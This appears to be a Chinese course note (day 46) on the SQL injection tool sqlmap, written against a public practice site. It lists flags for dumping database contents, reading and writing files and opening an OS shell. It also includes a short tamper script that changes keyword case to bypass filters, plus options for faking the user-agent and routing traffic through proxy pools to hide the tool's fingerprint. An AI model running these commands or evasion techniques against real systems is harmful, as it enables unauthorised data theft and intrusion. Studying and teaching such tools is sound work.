第46天:WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构
参考资料:https://www.cnblogs.com/bmjoker/p/9326258.html
最重要的:搞清楚数据库类型
数据猜解-库表列数据&字典
测试:http://vulnweb.com/
1 2 3 4 5 6 7
| --current-db
--tables -D "数据库名"
--columns -T "表名" -D "数据库名"
--dump -C "列名" -T "表名" -D "数据库名"
|
权限操作-文件&命令&交互式
测试:MYSQL高权限注入
1 2 3 4 5 6 7 8 9 10 11 12 13
| --is-dba --privileges
--file-read --file-write --file-dest
--os-cmd=ver/calc --os-shell --sql-shell
|
提交方法-POST&HEAD&JSON
测试:Post Cookie Json
1 2 3 4 5
| --data ""
--cookie ""
-r 1.txt
|
绕过模块-Tamper脚本-使用&开发
测试:base64注入 有过滤的注入
tamper模块:里面有很多脚本,可以直接使用,查看说明书就行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| --tamper=base64encode.py --tamper=test.py
from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW
def dependencies(): pass
def tamper(payload, **kwargs): if payload: payload = payload.replace('SELECT','sElEct') payload = payload.replace('OR','Or') payload = payload.replace('AND','And') payload = payload.replace('SLEEP','SleeP') payload = payload.replace('ELT','Elt') return payload
|
分析拓展-代理&调试&指纹&风险&等级
1、后期分析调试:
1 2 3
| -v=(0-6)
--proxy "http://xx:xx"
|
2、打乱默认指纹(sqlmap特征-UA打头):
1 2 3 4 5
| --user-agent ""
--random-agent
--time-sec=(2,5)
|
3、使用更多的测试:测试Header注入
1 2 3
| --level=(1-5)
--risk=(0-3)
|
代理池:使用快代理隧道代理(价格略高)